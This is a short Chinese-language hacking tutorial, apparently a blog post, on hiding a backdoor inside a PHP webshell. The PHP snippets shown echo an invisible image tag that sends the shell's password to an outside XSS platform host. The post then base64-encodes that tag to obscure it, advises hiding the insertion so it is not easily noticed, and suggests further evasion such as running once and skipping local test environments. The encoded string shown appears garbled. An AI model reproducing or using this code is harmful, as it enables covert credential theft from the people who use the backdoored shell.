Part 1 引子
说什么好呢,发个图就当个引子好了。
Part 2 XSS平台
创建项目
选择类型
xss代码
小实验,刷新代码
XSS平台上
Part 3 后门
我们写这样一个脚本
<?php $password = 'admin'; // 假设这个大马密码 // 这个是你自己的xss代码 echo '<img width=0height=0 src="http://xss.cn/xss.php?do=api&id=c7rL&location='.$password.'"/>';
浏览器,运行脚本
XSS平台上
加密XSS代码
最终脚本
<?php
$password = 'hacksb'; // 假设这个大马密码 $url = 'base64加密代码'; $hm = base64_decode($url); echo $hm.$password.' "/>';
测试下,运行脚本。
<?php $password = 'hacksb'; $url = 'PGltZB3aWR0aD0waGVpZ2h0PTAgc3JjPJodHRwOi8veHzMS5jbi94c3MucGhwP2RvPWFwaSZpZD1jNJmxvY2F0a9uPQ=='; $hm = base64_decode($url); echo $hm.$password.' "/>';
XSS平台上
Part 3 利用
找个大马。
插入后门代码。总之,尽可能不被别人轻而易举识破。还有变量名不要和大马本身冲突。
运行大马。
XSS平台上。嘿嘿嘿
Part 4 后记
这后门还不够完善,例如抓包,F12后门就漏出来了,有待完善。例如后门代码只运行一次,本地测试环境不执行后门代码。
